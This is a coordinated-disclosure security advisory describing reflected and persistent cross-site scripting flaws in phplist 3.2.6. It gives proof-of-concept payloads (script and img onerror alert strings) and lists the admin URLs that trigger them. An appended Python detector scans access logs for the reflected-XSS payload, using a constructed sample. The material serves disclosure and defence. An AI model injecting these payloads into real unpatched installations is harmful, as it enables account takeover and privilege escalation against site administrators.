phplist 3.2.6 Cross Site Scripting

2017.03.20
Credit: Tim Coen
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:     phplist 3.2.6
Fixed in:             3.3.1
Fixed Version Link:   https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:       https://www.phplist.org/
Vulnerability Type:   XSS
Remote Exploitable:   Yes
Reported to vendor:   01/10/2017
Disclosed to public:  02/20/2017
Release mode:         Coordinated Release
CVE:                  n/a (not requested)
Credits:              Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to Cross Site Scripting. The application contains one reflected XSS and multiple persistent XSS vulnerabilities. The persistent XSS vulnerabilities are only exploitable by users with specific privileges.

3. Details

Reflected XSS

CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

The page parameter is vulnerable to reflected XSS.

Proof of Concept:

http://localhost/lists/admin/?page=send\'\"><script>alert(8)</script>&id=187&tk=c

Persistent XSS

CVSS: Medium 5.5 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Various components of the administration interface are vulnerable to persistent XSS. While a user account is required to exploit these issues, they may be used by less privileged users to escalate their privileges.

Persistent XSS: List Name

The name of a list is echoed in various locations without encoding, leading to persistent XSS. An account with the privilege to create a list is required.

Add new List: http://localhost/lists/admin/?page=editlist&tk=c
As name use: list'"><img src=no onerror=alert(1)>

To trigger the payload, visit:
- Add new subscribers to list: http://localhost/lists/admin/?page=importsimple&list=84&tk=c
- Overview of all lists: http://localhost/lists/admin/?page=list&tk=c
- List members of list: http://localhost/lists/admin/?page=members&id=3&tk=c
- View member (loaded as part of the lists tab): http://localhost/lists/admin/?page=user&id=4
- Creating a Campaign (in step 4): http://localhost/lists/admin/?page=send&id=2&tk=c&tab=Lists

Persistent XSS: Subscribe Page

Various parameters of the subscribe page - such as the title - are vulnerable to persistent XSS. An account with the privilege to edit the subscribe page is required.

Add a new subscribe page: http://localhost/lists/admin/?page=spage
As title use: subscribe'"><img src=no onerror=alert(1)>

To trigger the payload:
- Visit the subscribe page: http://localhost/lists/index.php?p=subscribe&id=1
- Visit the subscribe page overview: http://localhost/lists/admin/?page=spage

Persistent XSS: Bounce Rule

The expression parameter of bounce rules is vulnerable to persistent XSS. An account with the privilege to edit bounce rules is required.

Add a new bounce rule: http://localhost/lists/admin/?page=bouncerules&type=active
As regular expression use: test'"&ht;<img src=no onerror=alert(1)&ht;

To trigger the payload:
- Visit the bounce rule overview: http://localhost/lists/admin/?page=bouncerules&type=active

4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:
https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download

Please note that a newer version might already be available.

5. Report Timeline

01/10/2017 Informed Vendor about Issue
01/16/2017 Vendor confirms
02/15/2017 Asked Vendor to confirm that new release fixes issues
02/15/2017 Vendor confirms
02/20/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/phplist-326-XSS-194.html

--
blog: https://www.curesec.com/blog
Atom Feed: https://www.curesec.com/blog/feed.xml
RSS Feed: https://www.curesec.com/blog/rss.xml
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
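The reflected XSS in section 3 rides on phplist's admin `page` parameter, which the application only ever uses to pick an admin script by name, so any quote or angle bracket in that value is a usable detection signal while an instance is still on 3.2.6. The following is an added example of that check over access-log lines (not Curesec's or phplist's own code); the log lines are constructed, the allowlist of page names is an assumption drawn only from the names that appear in this advisory, and the Common Log Format layout is assumed.

```python
"""Flag abuse of phplist's admin ``page`` parameter in web-server access logs.
Added example for this advisory, not Curesec's or phplist's own code. The log
lines are constructed; the allowlist is an assumption built only from the page
names that appear in the advisory."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: admin page names taken from the advisory. A real deployment
# would build this from the scripts actually present under lists/admin/.
KNOWN_PAGES = {"send", "editlist", "importsimple", "list", "members",
               "user", "spage", "bouncerules"}
# phplist selects an admin script by this name, so quotes or angle brackets
# were never a legitimate value, whatever the allowlist says.
PAGE_NAME = re.compile(r"^[a-z0-9_]+$")
# Common Log Format: client ident user [timestamp] "METHOD path proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def suspicious_page_values(line):
    """Return (client, timestamp, severity, page value) findings for one line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, ts, _method, path, _status = m.groups()
    url = urlsplit(path)
    if not url.path.startswith("/lists/admin"):
        return []
    findings = []
    for raw in parse_qs(url.query, keep_blank_values=True).get("page", []):
        value = unquote(raw)  # parse_qs decoded once; undo double-encoding too
        if not PAGE_NAME.match(value):
            findings.append((client, ts, "high", value))  # markup/quotes in name
        elif value not in KNOWN_PAGES:
            findings.append((client, ts, "low", value))   # valid syntax, unknown page
    return findings

def scan(log_text):
    """Scan a whole log; findings are returned in file order."""
    return [f for line in log_text.splitlines() for f in suspicious_page_values(line)]

# Constructed sample: normal request, the advisory's PoC as a browser sends it (URL-encoded), a non-admin request, an unknown page name.
SAMPLE_LOG = r'''
203.0.113.5 - - [20/Mar/2017:10:00:01 +0100] "GET /lists/admin/?page=list&tk=c HTTP/1.1" 200 5120
203.0.113.5 - - [20/Mar/2017:10:00:07 +0100] "GET /lists/admin/?page=send%5C%27%5C%22%3E%3Cscript%3Ealert(8)%3C/script%3E&id=187&tk=c HTTP/1.1" 200 4870
198.51.100.9 - - [20/Mar/2017:10:01:12 +0100] "GET /lists/index.php?p=subscribe&id=1 HTTP/1.1" 200 2210
198.51.100.9 - - [20/Mar/2017:10:02:30 +0100] "GET /lists/admin/?page=somepage&tk=c HTTP/1.1" 200 6001
'''

if __name__ == "__main__":
    for client, ts, severity, value in scan(SAMPLE_LOG):
        print(f"[{severity}] {ts} {client}: page={value!r}")
```

The "low" tier only means the name is syntactically plausible but outside the allowlist, so expect to extend KNOWN_PAGES from the real admin directory before treating those hits as alerts.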

